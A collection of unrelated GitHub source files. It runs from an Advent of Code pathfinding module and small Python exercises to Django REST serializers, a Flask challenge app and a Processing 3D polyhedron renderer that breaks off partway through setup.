yield Expedition(cell=cell, t=t, goal=self.goal, snow_map=self.snow_map,
parent=self)
@property
def is_at_goal(self) -> bool:
"""Check if this Expedition is currently at the goal cell."""
return self.cell == self.goal
@property
def reachable_cells(self) -> set[Cell]:
"""Set of all cells this Expedition could reach in one time step."""
deltas = list(DELTA_MAP.values()) + [(0, 0)]
return {Cell(x=self.cell.x + dx, y=self.cell.y + dy) for dx, dy in deltas}
class Valley:
"""Mountain-walled, blizzard-swept rectangular area with only two exit points."""
def __init__(self, region: Region, snow_map: SnowMap, start: "Cell", goal: "Cell"):
self.region, self.snow_map = region, snow_map
self.start, self.goal = start, goal
def plan_travel_to_goal(self, t: int) -> Expedition:
"""Find the shortest path through the blizzards from the start to the goal."""
start = Expedition(cell=self.start, t=t, goal=self.goal, snow_map=self.snow_map)
goal = a_star_search(start=start, goal_func=lambda node: node.is_at_goal)
return goal
def plan_travel_to_start(self, t: int) -> Expedition:
"""Find the shortest path through the blizzards from the goal to the start."""
start = Expedition(cell=self.goal, t=t, goal=self.start, snow_map=self.snow_map)
goal = a_star_search(start=start, goal_func=lambda node: node.is_at_goal)
return goal
@property
def mountains(self) -> set[Cell]:
"""Cells defining the mountains that wall the Valley."""
length = self.region.max_y - self.region.min_y + 3
width = self.region.max_x - self.region.min_x + 3
bottom_wall = {Cell(x=x, y=0) for x in range(width)}
top_wall = {Cell(x=x, y=length - 1) for x in range(width)}
left_wall = {Cell(x=0, y=y) for y in range(1, length - 1)}
right_wall = {Cell(x=width - 1, y=y) for y in range(1, length - 1)}
return top_wall | bottom_wall | left_wall | right_wall - {self.start, self.goal}
@classmethod
def from_strings(cls, strings: list[str]) -> "Valley":
"""Create a new Valley from the strings describing its initial state."""
length, width = len(strings), len(strings[0])
start = Cell(x=strings[0].index("."), y=length - 1)
goal = Cell(x=strings[-1].index("."), y=0)
region = Region(
min_x=1, max_x=width - 2, min_y=1, max_y=length - 2, other={start, goal})
snow_map = SnowMap.from_strings(strings=strings, region=region)
return Valley(region=region, start=start, goal=goal, snow_map=snow_map)
| JaviLunes/AdventCode2022 | src/aoc2022/day_24/tools.py | tools.py | py | 8,908 | python | en | code | 0 | github-code | 13 |
10045945107 | from random import randint
answers = ['Outlook good', 'Yes Signs point to yes', 'Reply hazy', 'try again', 'Ask again later', 'Better not tell you now','It is certain', 'It is decidedly so', 'Without a doubt', 'Yes – definitely', 'You may rely on it', 'As I see it, yes', 'Most likely', 'Cannot predict now', 'Concentrate and ask again', 'Dont count on it', 'My reply is no', 'My sources say no', 'Outlook not so good', 'Very doubtful']
print ("hello stranger! I am the magic 8 ball")
print("**************")
def Magic8Ball():
print("Ask me a question")
input()
print(answers[randint(0, len(answers) -1)])
print("I hope that helped.")
choice = Replay()
if(choice == "Y"):
Magic8Ball()
elif(choice == "N"):
return
else:
print("I did not understand! Please repeat.")
Replay()
def Replay():
print("Do you have another question? Type Y is yes and N if no")
choice = input()
return choice
Magic8Ball()
print("I hope you got your answers")
| arnavpshah/arnavpshah-Python | magic_8_ball.py | magic_8_ball.py | py | 1,023 | python | en | code | 0 | github-code | 13 |
13613062640 | class Solution(object):
# traversal the list once, running time is O(n)
def searchInsert(self, nums, target):
length, index = len(nums), 0
while index < length:
if nums[index] >= target:
return index
else:
index += 1
return index
# Start from two end simultaneously, running time O(n/2)
def second_solution(self, nums, target):
length = len(nums)
i, j = 0, length - 1
while i <= j:
num_i, num_j = nums[i], nums[j]
if num_i < target and num_j >= target:
i += 1
j -= 1
elif num_i < target:
return j+1
else:
return i
return i
# This solution uses binary search, running time is O(log n)
def third_solution(self, nums, target):
length = len(nums)
start, end = 0, length - 1
mid = (start + end) / 2
while (start <= end):
if nums[start] >= target:
return start
if nums[end] < target:
return end + 1
if nums[end] == target:
return end
mid_v = nums[mid]
if mid_v == target:
return mid
elif mid_v < target:
start = mid + 1
mid = (start + end) / 2
else:
end = mid - 1
mid = (start + end) / 2
| clovery410/mycode | leetcode/35search_insert_position.py | 35search_insert_position.py | py | 1,513 | python | en | code | 1 | github-code | 13 |
14646907565 | from sqlalchemy import Column, Identity, Integer, String, Table
from . import metadata
SubscriptionPendingInvoiceItemIntervalJson = Table(
"subscription_pending_invoice_item_intervaljson",
metadata,
Column(
"interval",
String,
comment="Specifies invoicing frequency. Either `day`, `week`, `month` or `year`",
),
Column(
"interval_count",
Integer,
comment="The number of intervals between invoices. For example, `interval=month` and `interval_count=3` bills every 3 months. Maximum of one year interval allowed (1 year, 12 months, or 52 weeks)",
),
Column("id", Integer, primary_key=True, server_default=Identity()),
)
__all__ = ["subscription_pending_invoice_item_interval.json"]
| offscale/stripe-sql | stripe_openapi/subscription_pending_invoice_item_interval.py | subscription_pending_invoice_item_interval.py | py | 758 | python | en | code | 1 | github-code | 13 |
37943988708 | # Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
from HepMCAnalysis_i.HepMCAnalysis_iConf import HepMCAnalysis
class HepMCAnalysis_i(HepMCAnalysis):
def __init__(self, name = "HepMCAnalysis_i", file = None):
super( HepMCAnalysis_i, self ).__init__( name )
self.OutputFile = "hepmcanalysis.root"
from AthenaCommon.Logging import logging
log = logging.getLogger( 'HepMCAnalysis_i' )
# set defaults
if file:
self.OutputFile = file
log.info("changing output file name to %s" % self.OutputFile)
# create THistSvc if not yet done
from AthenaCommon.AppMgr import ServiceMgr as svcMgr
if not hasattr( svcMgr, "THistSvc"):
log.info("will setup THistSvc and add instance to ServiceMgr")
from GaudiSvc.GaudiSvcConf import THistSvc
myHistSvc = THistSvc()
svcMgr += myHistSvc
else:
myHistSvc = svcMgr.THistSvc
# defining stream and output file
log.info("here0")
log.info("Output file: %s" % self.OutputFile)
myHistSvc.Output += [ ("hepmcanalysis DATAFILE='%s' OPT='RECREATE'" % self.OutputFile)] ####if this line is commented in the segmentation fault appears!!!!!
myHistSvc.OutputLevel = 1
#####if the above line is commented out then the segmentation fault appears at event number 5!!!!! STRANGE!!!!!
#myHistSvc.Output += [ ("hepmcanalysis DATAFILE='test.root' OPT='RECREATE'") ]
# overriding default IHistSvc in algorithm
self.ITHistSvc = myHistSvc
#self.ITHistSvc.Output = [ ("hepmcanalysis DATAFILE='%s' OPT='RECREATE'" % self.OutputFile)] ####if this line is commented in the segmentation fault appears!!!!!
#####if the above line is commented out then the segmentation fault appears at event number 5!!!!! STRANGE!!!!!
| rushioda/PIXELVALID_athena | athena/Generators/HepMCAnalysis_i/python/HepMCAnalysis_iConfig.py | HepMCAnalysis_iConfig.py | py | 1,957 | python | en | code | 1 | github-code | 13 |
14979063472 | from datetime import date
from rest_framework import serializers
from django.db import models
from basemodels import UserData, Stock, StockData, Product, Nature, ProductSupplier, \
ProductPacking, StockMovement, PurchaseDocuments, Company, Installation, Lagerausgang, InstallationLinks, \
InstallationConsumption, InstallationCounterHistory, ProductType
from models import Supplier01, PurchaseDoc01
from django.contrib.auth.models import User, Group
class StaffSerializer(serializers.ModelSerializer):
Meta = None
def getStaffSerializer(model):
#Serializer generator
fields = ('id', 'firstname', 'lastname', 'phone', 'mobile', 'mail', 'gender')
return type(model.__name__+'Serializer', (StaffSerializer,), dict(Meta = type("Meta", (),
{'fields' : fields, 'model': model})))
class ProjectSerializer(serializers.ModelSerializer):
Meta = None
def getProjectSerializer(model, staffmodel):
fields = ('id', 'description', 'customer', 'address', 'country', 'zipcode', 'city', 'manager', 'leader',
'leaderid', 'managerid','status','start_project','end_project')
return type(model.__name__ + 'Serializer', (ProjectSerializer,), dict(
Meta=type("Meta", (),{'fields': fields, 'model': model}),
manager=getStaffSerializer(staffmodel)(read_only=True, allow_null=True),
leader=getStaffSerializer(staffmodel)(read_only=True, allow_null=True)
))
class SupplierSerializer(serializers.HyperlinkedModelSerializer):
# def __init__(self, *args, **kwargs):
# # Only used for debugging. Extend init to print repr of Serializer instance.
# super(SupplierSerializer, self).__init__(*args, **kwargs)
# print(repr(self))
Meta = None
def getSupplierSerializer(model):
fields = ('url', 'id', 'namea', 'nameb', 'address', 'zipcode', 'city', 'country', 'phone', 'fax', 'vatnum', 'active',
'numberorders', 'mainmail')
return type(model.__name__ + 'Serializer', (SupplierSerializer,), dict(
Meta=type("Meta", (),{'fields': fields, 'model': model})
))
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email', 'first_name', 'last_name', 'groups')
class UserDataSerializer(serializers.ModelSerializer):
username = serializers.CharField(source='user.username', allow_blank=True)
email = serializers.CharField(source='user.email', allow_blank=True)
first_name = serializers.CharField(source='user.first_name', allow_blank=True)
last_name = serializers.CharField(source='user.last_name', allow_blank=True)
class Meta:
model = UserData
fields = ('user', 'username', 'email','first_name', 'last_name', 'companyid','hituserid')
class CompanySerializer(serializers.ModelSerializer):
class Meta:
model = Company
class StockSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Stock
fields = ('url', 'id', 'name', 'stockkeeper', 'type', 'defaultlocationid')
class StockMovementSerializer(serializers.ModelSerializer):
class Meta:
model = StockMovement
fields = ('movementid', 'datecreation', 'datemodification', 'stockid', 'prodid', 'quantitydelta',
'moduleid', 'modulerecordtypeid', 'key1', 'userid', 'comment')
class NatureSerializer(serializers.HyperlinkedModelSerializer):
"""def __init__(self, *args, **kwargs):
#Only used for debugging. Extend init to print repr of Serializer instance.
super(NatureSerializer, self).__init__(*args, **kwargs)
print(repr(self))"""
class Meta:
model = Nature
fields = ('url', 'id', 'title', 'name')
class ProductTypeSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ProductType
fields = ('id', 'name')
class ProductSerializer(serializers.HyperlinkedModelSerializer):
# def __init__(self, *args, **kwargs):
# #Only used for debugging. Extend init to print repr of Serializer instance.
# super(ProductSerializer, self).__init__(*args, **kwargs)
# print(repr(self))
nature = serializers.SlugRelatedField(read_only=True, slug_field='name')
supplier = serializers.HyperlinkedRelatedField(many=True, read_only=True, view_name="productsupplier-detail")
packing = serializers.HyperlinkedRelatedField(many=True, read_only=True, view_name="productpacking-detail", lookup_field="pk")
# defaultsupplier = serializers.SlugRelatedField(read_only=True, allow_null=True, slug_field='namea')
defaultsupplier = getSupplierSerializer(Supplier01)(read_only=True, allow_null=True)
producttype = ProductTypeSerializer(read_only=True, allow_null=True)
#ToDo: getter for ProductSerializer
class Meta:
model = Product
fields = (
'url', 'id', 'name1', 'detailedname1', 'title', 'marked', 'unit1', 'grosspurchaseprice', 'netpurchaseprice',
'stockcur', 'stockavail', 'salesmargin', 'salesprice', 'taxcodeinvoice',
'taxcodecreditnote', 'shopprice', 'defaultsupplier', 'resourcenatureid', 'nature', 'supplier', 'packing',
'producttype')
# Need to generate a fake request for our hyperlinked results
from django.test.client import RequestFactory
context = dict(request=RequestFactory().get('/'))
class StockDataSerializer(serializers.HyperlinkedModelSerializer):
prodid = ProductSerializer(read_only=True, allow_null=True)
class Meta:
model = StockData
fields = (
'url', 'id', 'rowid', 'stockid', 'prodid', 'quantitymin', 'quantitymax', 'quantitycur', 'quantityavail',
'location')
def to_representation(self, obj):
data = super(StockDataSerializer, self).to_representation(obj)
product = ProductSerializer(Product.objects.filter(id=obj.prodid)[0], context=context).data['nature']
data['nature'] = product
# data['prodid'] = NatureSerializer(Nature.objects.filter(id=obj.prodid)[0], context=context).data
return data
class ProductPackingSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ProductPacking
fields = ('url', 'rowid', 'packingid', 'prodid', 'name', 'quantity')
class ProductSupplierSerializer(serializers.HyperlinkedModelSerializer):
supplierid = getSupplierSerializer(Supplier01)(read_only=True, allow_null=True)
class Meta:
model = ProductSupplier
fields = ('url', 'prodid', 'supplierid', 'purchaseprice', 'comment', 'unit', 'id')
"""def getProductSupplierSerializer(supplier_model):
fields = ('url', 'prodid', 'supplierid', 'purchaseprice', 'comment', 'unit', 'id')
return type('ProductSupplierSerializer', (ProductSupplierSerializer,), dict(
Meta=type("Meta", (), {
'fields': fields,
'model': ProductSupplier}),
supplierid=getStaffSerializer(supplier_model)(read_only=True, allow_null=True)
))
"""
from collections import OrderedDict
from rest_framework.fields import SkipField
from rest_framework.compat import unicode_to_repr
class FastProductSerializer(serializers.ModelSerializer):
def to_representation(self, instance):
"""
Object instance -> Dict of primitive datatypes.
"""
# ret = OrderedDict()
ret = {}
fields = self._readable_fields
for field in fields:
try:
attribute = field.get_attribute(instance)
except SkipField:
continue
if attribute is None:
# We skip `to_representation` for `None` values so that
# fields do not have to explicitly deal with that case.
ret[field.field_name] = None
else:
ret[field.field_name] = field.to_representation(attribute)
return ret
class Meta:
model = Product
fields = ('id', 'name1', 'detailedname1', 'title', 'marked', 'unit1', 'grosspurchaseprice', 'netpurchaseprice',
'stockcur', 'stockavail', 'salesmargin', 'salesprice', 'taxcodeinvoice',
'taxcodecreditnote', 'shopprice', 'defaultsupplier', 'resourcenatureid')
class DeliveryNoteDataSerializer(serializers.ModelSerializer):
rowid = serializers.IntegerField(allow_null=True)
Meta = None
def getDeliveryNoteDataSerializer(model):
fields = ('linetype', 'rowid', 'deliverynoteid', 'prodid', 'name', 'unit', 'quantity', 'price', 'amount', 'projectid',
'comment', 'dataid', 'packing', 'calclineexpression', 'quantityrejected', 'stockmovementid')
return type(model.__name__+"Serializer", (DeliveryNoteDataSerializer,), dict(Meta=type("Meta",(),{'fields' : fields, 'model': model})))
class DeliveryNoteSerializer(serializers.ModelSerializer):
id = serializers.CharField(required=False, max_length=15, allow_blank=True)
#data = DeliveryNoteDataSerializer(many=True, allow_null=True, required=False)
Meta = None
def create(self, validated_data):
""" Creates a Deliverynote and corresponding Stockmovement"""
data = validated_data.pop('data') # 'data' needs to be removed first
model = self.Meta.model
datamodel = self.Meta.datamodel
deliverynote = model.objects.create(**validated_data)
# Wichtig: Im foreign key feld muss immer das Object selbst referenziert werden, nicht die ID des Objekts,
# also 'prodid': <Product: N999> und nicht 'prodid': 'N999'
# Die Feldbezeichnung purchasedocid ist in diesem Fall verwirrend: In purchasedoc umbenennen?
for entry in data:
data_data = dict(entry)
datamodel.objects.create(deliverynoteid=deliverynote, **data_data)
# add stockmovement
datecreation = "%s-%s-%s" % (date.today().year, date.today().month, date.today().day)
#stock = Stock.objects.get(id=deliverynote.stockid)
#product = Product.objects.get(id=data_data["prodid"])
#stockdata = StockData.objects.filter(stockid=0).filter(prodid__id=data_data["prodid"])
#StockMovement.objects.create(datecreation=datecreation, datemodification=datecreation,
# stockid=stock, prodid=product, quantitydelta=data_data["quantity"], moduleid=6,
# modulerecordtypeid=6000, key1=deliverynote.id, userid=deliverynote.responsible)
return deliverynote
def getDeliveryNoteSerializer(model, datamodel):
fields = ('id', 'orderid','extdocno', 'subject', 'responsible', 'doctype', 'module', 'modulerefid', 'supplierid', 'status',
'docdate', 'stockid', 'supplierinvoicenumber', 'data')
return type(model.__name__+"Serializer", (DeliveryNoteSerializer,), dict(
Meta=type("Meta",(),{'fields' : fields, 'model': model,'datamodel':datamodel}),
data=getDeliveryNoteDataSerializer(datamodel)(many=True, allow_null=True, required=False)))
class PurchaseDocDataSerializer(serializers.ModelSerializer):
rowid = serializers.IntegerField(allow_null=True)
Meta = None
def getPurchaseDocDataSerializer(model):
fields = ('rowid', 'purchasedocid', 'prodid', 'name', 'unit', 'quantity', 'price', 'amount', 'packing', 'comment', 'dataid', 'projectid', 'stockmovementid')
return type(model.__name__+"Serializer", (PurchaseDocDataSerializer,), dict(Meta=type("Meta",(),{'fields' : fields, 'model': model})))
class PurchaseDocSerializer(serializers.ModelSerializer):
id = serializers.CharField(required=False, max_length=15, allow_blank=True)
class Meta:
fields = (
'url', 'id','subject','responsible','leader','doctype', 'module','modulerefid', 'supplierid', 'status',
'docdate', 'data', 'deliverynotes','stockid')
def create(self, validated_data):
data = validated_data.pop('data') # 'data' needs to be removed first
deliverynotes = validated_data.pop('deliverynotes')
# reference model from Meta, so it is replaced in inherited serializers
purchasedoc = self.Meta.model.objects.create(**validated_data)
# Wichtig: Im foreign key feld muss immer das Object selbst referenziert werden, nicht die ID des Objekts,
# also 'prodid': <Product: N999> und nicht 'prodid': 'N999'
# Die Feldbezeichnung purchasedocid ist in diesem Fall verwirrend: In purchasedoc umbenennen?
for entry in data:
data_data = dict(entry)
self.Meta.datamodel.objects.create(purchasedocid=purchasedoc, **data_data)
return purchasedoc
def update(self, instance, validated_data):
# The standard implementation is fine, as long as we do not use it for nested writes
for attr, value in validated_data.items():
setattr(instance, attr, value)
instance.save()
return instance
def getPurchaseDocSerializer(model, datamodel, delno_model, delno_datamodel):
fields = ('url','id','subject','remark','responsible','leader','doctype', 'module','modulerefid', 'supplierid', 'status',
'docdate', 'data', 'deliverynotes','stockid')
return type(model.__name__+"Serializer", (PurchaseDocSerializer,), dict(
Meta=type("Meta",(),{'fields' : fields, 'model': model,'datamodel':datamodel}),
data=getPurchaseDocDataSerializer(datamodel)(many=True, allow_null=True, required=False),
deliverynotes=getDeliveryNoteSerializer(delno_model, delno_datamodel)(many=True, allow_null=True, required=False)))
class PurchaseDocumentsSerializer(serializers.ModelSerializer):
class Meta:
model = PurchaseDocuments
class LagerausgangSerializer(serializers.ModelSerializer):
class Meta:
model = Lagerausgang
class MinPurchaseDocSerializer(serializers.ModelSerializer):
id = serializers.CharField(required=False, max_length=15, allow_blank=True)
class Meta:
model = PurchaseDoc01
fields = ('url', 'id', 'responsible', 'doctype', 'module', 'status', 'docdate')
class InstallationLinksSerializer(serializers.ModelSerializer):
rowid = serializers.IntegerField(allow_null=True)
class Meta:
model = InstallationLinks
fields = ('id','rowid','filename','name','date')
class InstallationConsumptionSerializer(serializers.ModelSerializer):
rowid = serializers.IntegerField(allow_null=True)
class Meta:
model = InstallationConsumption
fields = ('id','rowid','date','quantity')
class InstallationCounterHistorySerializer(serializers.ModelSerializer):
class Meta:
model = InstallationCounterHistory
fields = ('id','datecounter','counter')
class InstallationSerializer(serializers.ModelSerializer):
prodid = ProductSerializer(read_only=True, allow_null=True)
links = InstallationLinksSerializer(many=True, allow_null=True, required=False)
#links = serializers.HyperlinkedRelatedField(many=True, read_only=True, view_name="installationlinks-detail",
# lookup_field="pk")
class Meta:
model = Installation
fields = ('id','name1','name2','chassisnum','licenseplate','purchasevalue','availability','availabilitystatus',
'availabilitystatusold','rentperdayresourceid','title','titlegrade','prodid','links','gpstag',
'constructionyear','datepurchase')
| MatthiasLenz/Lagerverwaltung | lagerapp/masterdata/serializers.py | serializers.py | py | 15,412 | python | en | code | 1 | github-code | 13 |
5726235309 | class Vacancy:
"""Class to represent vacancy information"""
def __init__(self, name: str, url: str, salary: int,
employer: str, requirement: str) -> None:
"""
Instance initialisation
:name: Vacancy name
:url: URL link to vacancy
:salary: Minimum salary
:description: Description of the vacancy/company
:requirement: Vacancy requirements
"""
# Validate data for attributes
if type(name) is str:
self.name = name
else:
raise TypeError('Vacancy name must be string')
if type(url) is str:
self.url = url
else:
raise TypeError('Vacancy URL must be string')
if type(salary) is int:
self.salary = salary
else:
raise TypeError('Vacancy salary must be integer')
if type(employer) is str:
self.employer = employer
else:
raise TypeError('Vacancy description must be integer')
if type(requirement) is str:
self.requirement = requirement
else:
raise TypeError('Vacancy requirement must be integer')
def __repr__(self) -> str:
"""Returns a developer representation of Vacancy class"""
return (
f"Vacancy({self.name}, {self.url}, {self.salary}, "
f"{self.employer}, {self.requirement})"
)
def __str__(self) -> str:
""""Returns a user representation of Vacancy class"""
return (
f"Name: {self.name}\n"
f"URL: {self.url}\n"
f"Salary: {self.salary}\n"
f"Company: {self.employer}\n"
f"Requirement:\n{self.requirement}\n"
)
def __eq__(self, other) -> bool:
"""
Checks if salaries between two vacancies are equal
"""
if type(other) == Vacancy:
return self.salary == other.salary
else:
raise ValueError("Must be <Vacancy> object")
def __lt__(self, other) -> bool:
"""
Checks if salary of this vacancy is less than other
"""
if type(other) == Vacancy:
return self.salary < other.salary
else:
raise ValueError("Must be <Vacancy> object")
def __le__(self, other) -> bool:
"""
Checks if salary of this vacancy is less than other or equal
"""
if type(other) == Vacancy:
return self.salary <= other.salary
else:
raise ValueError("Must be <Vacancy> object")
def __gt__(self, other) -> bool:
"""
Checks if salary of this vacancy is more than other
"""
if type(other) == Vacancy:
return self.salary > other.salary
else:
raise ValueError("Must be <Vacancy> object")
def __ge__(self, other) -> bool:
"""
Checks if salary of this vacancy is more than other or equal
"""
if type(other) == Vacancy:
return self.salary >= other.salary
else:
raise ValueError("Must be <Vacancy> object")
| MarkPcv/vacancy_parser_oop | services/vacancy.py | vacancy.py | py | 3,162 | python | en | code | 1 | github-code | 13 |
20511403367 | from flask import *
from flag import getflag
app = Flask(__name__)
app.secret_key = 'oh you got it, one more step to get flag'
@app.route('/', methods=['GET', 'POST'])
def index():
if request.is_json:
action = request.json.get('action', '').strip()
flag = getflag(request.json.get('token', '').strip())
if action=='login':
if request.json.get('flag', '').strip()==flag:
session['admin'] = True
return '已登录'
else:
return 'flag错误'
elif action=='logout':
session['admin'] = False
return '已注销'
elif action=='getflag':
if 'admin' in session and session['admin']:
return 'Here is your flag: '+flag
else:
return '请登录后查看flag'
else:
return '操作无效'
else:
return render_template('index.html')
@app.route('/src')
def src():
with open(__file__, encoding='utf-8') as f:
src = f.read()
src = src.replace(repr(app.secret_key), '***')
resp = Response(src)
resp.headers['content-type'] = 'text/plain; charset=utf-8'
return resp
app.run('0.0.0.0', 5000, True) | PKU-GeekGame/geekgame-0th | src/session/game/app.py | app.py | py | 1,293 | python | en | code | 46 | github-code | 13 |
40808750050 | import platform
import subprocess
class NixSys(object):
def __init__(self):
uname = platform.uname()
arch = platform.architecture()
self.name = uname.node
self.release = uname.release
self.version = uname.version
self.machine = uname.machine
self.arch = arch[0]
self.cpu_model = ""
self.cpu_processor = ""
self.cpu_mhz = ""
self.mem_total = 0
self.mem_free = 0
self.cpu_usage = 1
self._prev_idle = 0
self._prev_total = 0
#CPU INFO
cpuinfo = open('/proc/cpuinfo')
cpuraw = cpuinfo.read()
for line in cpuraw.splitlines():
line = line.split(":")
line[0] = line[0].strip("\t")
if len(line) > 1:
line[1] = line[1].strip("\t")
if line[0] == "model name":
self.cpu_model = line[1]
elif line[0] == "processor":
self.cpu_processor = line[1]
elif line[0] == "cpu MHz":
self.cpu_mhz = line[1]
#await self._cpu()
#await self._ram()
async def _ram(self):
meminfo = open('/proc/meminfo')
memraw = meminfo.read()
for line in memraw.splitlines():
line = line.split(":")
line[0] = line[0].strip("\t")
if len(line) > 1:
line[1] = line[1].strip("\t")
if line[0] == "MemTotal":
self.mem_total = line[1].strip(" kB")
self.mem_total = str(int(int(self.mem_total)/1024))
if line[0] == "MemFree":
self.mem_free = line[1].strip(" kB")
self.mem_free = str(int(int(self.mem_free)/1024))
async def _cpu(self):
self.cpu_usage = 1
stat = open('/proc/stat')
raw = stat.read()
cpu = raw.splitlines()[0].split(" ")
user = int(cpu[2])
nice = int(cpu[3])
sys = int(cpu[4])
idle = int(cpu[5])
iow = int(cpu[6])
irq = int(cpu[7])
sirq = int(cpu[8])
steal = int(cpu[9])
current_idle = idle + iow
current_nonidle = user + nice + sys + irq + sirq + steal
current_total = current_idle + current_nonidle
total = current_total - self._prev_total
idled = current_idle - self._prev_idle
try:
self.cpu_usage = int((total - idled)/total*100)
except:
print(total, idled)
self._prev_idle = current_idle
self._prev_total = current_total
async def _top(self):
self.cpu_usage = 1
self.mem_total = 100
self.mem_free = 1
try:
raw = subprocess.check_output(['top','-b','-n 1'])
lines = raw.splitlines()
#MEM
mem = str(lines[3])
mem2 = mem.replace(" ", " ").replace(" ", " ").replace(" ", " ").split(" ")
self.mem_total = mem2[2]
self.mem_free = mem2[6]
#CPU
usage_index = str(lines[6]).index("%CPU")-1
total = 0
for i in range(7,len(lines)):
total += float(str(lines[i])[usage_index:usage_index+5])
except:
pass
async def update(self):
r = await self._ram()
r = await self._cpu()
| alierkanimrek/rpct | src/axones/nixsys/main.py | main.py | py | 3,450 | python | en | code | 0 | github-code | 13 |
73788712338 | import shapes
import rendering
import matrix
import math
# Variáveis globais
window_width = 640
window_height = 480
cubo = None
x_axis, y_axis, z_axis = None, None, None
controls = False
controls_string_off = "Pressione [TAB] para exibir os controles"
controls_string_on = """Translacao:
Q = X+ | W = X-
E = Y+ | R = Y-
T = Z+ | Y = Z-
Escala:
A = X+ | S = X-
D = Y+ | F = Y-
G = Z+ | H = Z-
Rotacao:
Z = X+ | X = X-
C = Y+ | V = Y-
B = Z+ | N = Z-"""
controls_string_extra = """Extras:
[TAB] = Exibe/Esconde
o menu de ajuda.
[BACKSPACE] = Reinicia
o poliedro para suas
configuracoes originais.
P = Altera a funcao
de projecao."""
class Polyhedron:
# Variáveis de Classe
render_method = 0
proj_angle = 45
# Construtor da classe
def __init__(self):
# Define os valores padrão dos atributos do objeto
self.vertexes = []
self.edges = []
self.rotation = [0, 0, 0]
self.translation = [0, 0, 0]
self.scaling = [1, 1, 1]
self.info = False
self.border_color = 255
# Adiciona um vértice à lista
def addVertex(self, new_vertex):
if type(new_vertex[0]) is int:
self.vertexes.append(new_vertex)
elif type(new_vertex[0]) is float:
self.vertexes.append(new_vertex)
elif type(new_vertex[0]) is list:
for single_vertexes in new_vertex:
self.addVertex(single_vertexes)
else:
assert 0 == 1, "Vértice(s) inválido(s)!"
# Adiciona uma aresta à lista
def addEdge(self, new_edge):
if type(new_edge[0]) is int:
self.edges.append(new_edge)
elif type(new_edge) is list:
for single_edges in new_edge:
self.addEdge(single_edges)
else:
assert 0 == 1, "Aresta(s) inválida(s)!"
# Altera os valores dos ângulos de rotação
def rotate(self, angle_array):
self.rotation = angle_array
# Altera os valores de translação
def translate(self, translation_array):
self.translation = translation_array
# Altera os valores da escala
def scale(self, scale_array):
self.scaling = scale_array
# Retorna uma cópia do poliedro tendo aplicado escala, rotação e translação.
def update(self):
vertex_n = len(self.vertexes)
# Cria a matriz de vértices
updated_m = matrix.Matrix(vertex_n, 3, [])
for index in range(vertex_n):
updated_m.data.append(self.vertexes[index][0])
updated_m.data.append(self.vertexes[index][1])
updated_m.data.append(self.vertexes[index][2])
# Calcula o ponto central do objeto
mean = [0, 0, 0]
for vertex in self.vertexes:
mean[0] += vertex[0]
mean[1] += vertex[1]
mean[2] += vertex[2]
mean[0] = float(mean[0]) / vertex_n
mean[1] = float(mean[1]) / vertex_n
mean[2] = float(mean[2]) / vertex_n
# Cria uma matriz de translação inicial.
itransl_m = matrix.Matrix(vertex_n, 3, [])
for index in range(vertex_n):
itransl_m.data.append(-mean[0])
itransl_m.data.append(-mean[1])
itransl_m.data.append(-mean[2])
sx, sy, sz = self.scaling[0], self.scaling[1], self.scaling[2]
# Cria uma matriz de escala.
scale_m = matrix.Matrix(3, 3, [sx, 0, 0,
0, sy, 0,
0, 0, sz])
# Pré-calcula os valores de seno e cosseno dos ângulos de rotação
a = cos(radians(self.rotation[0]))
b = sin(radians(self.rotation[0]))
c = cos(radians(self.rotation[1]))
d = sin(radians(self.rotation[1]))
e = cos(radians(self.rotation[2]))
f = sin(radians(self.rotation[2]))
# Cria a matriz de rotação geral.
# Essa matriz foi obtida pela multiplicação das
# três matrizes de rotação uma pela outra.
rotation_m = matrix.Matrix(3, 3, [((c * e) - (b * d * f)), (-a * f), ((d * e) + (b * c * f)),
((b * d * e) + (c * f)), (a * e), ((-b * c * e) + (d * f)),
(-a * d), b, (a * c)])
# Cria a matriz de translação do polígono.
transl_m = matrix.Matrix(vertex_n, 3, [])
for index in range(vertex_n):
transl_m.data.append(self.translation[0])
transl_m.data.append(self.translation[1])
transl_m.data.append(self.translation[2])
# Aplica a translação inicial nos pontos do polígono.
updated_m += itransl_m
# Aplica a escala nos pontos do polígono.
updated_m *= scale_m
# Aplica a rotação nos pontos do polígono.
updated_m *= rotation_m
# Desfaz a translação inicial nos pontos do polígono.
updated_m -= itransl_m
# Aplica a matriz de translação nos pontos do polígono.
updated_m += transl_m
# Exclui as matrizes de operação
itransl_m = None
scale_m = None
rotation_m = None
transl_m = None
# Cria o polígono atualizado
updated = Polyhedron()
for index in range(vertex_n):
updated.addVertex(updated_m[index])
for index in range(len(self.edges)):
updated.addEdge(self.edges[index])
updated.info = self.info
updated.border_color = self.border_color
updated.render_method = self.render_method
return updated
# Renderiza o polígono
def render(self):
if self.render_method == 0:
rendering.cavalier(self.update(), self.proj_angle)
elif self.render_method == 1:
rendering.cabinet(self.update(), self.proj_angle)
elif self.render_method == 2:
rendering.isometric(self.update())
# Função padrão que retorna a cópia de um objeto
def __copy__(self):
new = Polyhedron()
new.vertexes = self.vertexes
new.edges = self.edges
new.rotation = self.rotation
new.translation = self.translation
new.scaling = self.scaling
new.filled = self.filled
new.paint_points = self.paint_points
new.border_color = self.border_color
new.fill_color = self.fill_color
new.render_method = self.render_method
return new
####################################################################################################################################################
def setup():
global cubo, x_axis, y_axis, z_axis
#size(window_width, window_height) # Define o tamanho da janela.
fullScreen()
background(0) # Define a cor do plano de fundo(branco).
ellipseMode(RADIUS) # Define que as elipses tenham sua posição definida pelo centro.
textAlign(CENTER) # Define o alinhamento do texto
textSize(10) # Define o tamanho do texto
# Eixos
x_axis = Polyhedron()
x_axis.addVertex([0, 0, 0])
x_axis.addVertex([1, 0, 0])
x_axis.addEdge([0, 1])
x_axis.translate([width/2, height/2, 0])
x_axis.border_color = color(0, 0, 200)
x_axis.scale([2000, 2000, 2000])
y_axis = Polyhedron()
y_axis.addVertex([0, 0, 0])
y_axis.addVertex([0, 1, 0])
y_axis.addEdge([0, 1])
y_axis.translate([width/2, height/2, 0])
y_axis.border_color = color(200, 0, 0)
y_axis.scale([2000, 2000, 2000])
z_axis = Polyhedron()
z_axis.addVertex([0, 0, 0])
z_axis.addVertex([0, 0, 1])
z_axis.addEdge([0, 1])
z_axis.translate([width/2, height/2, 0])
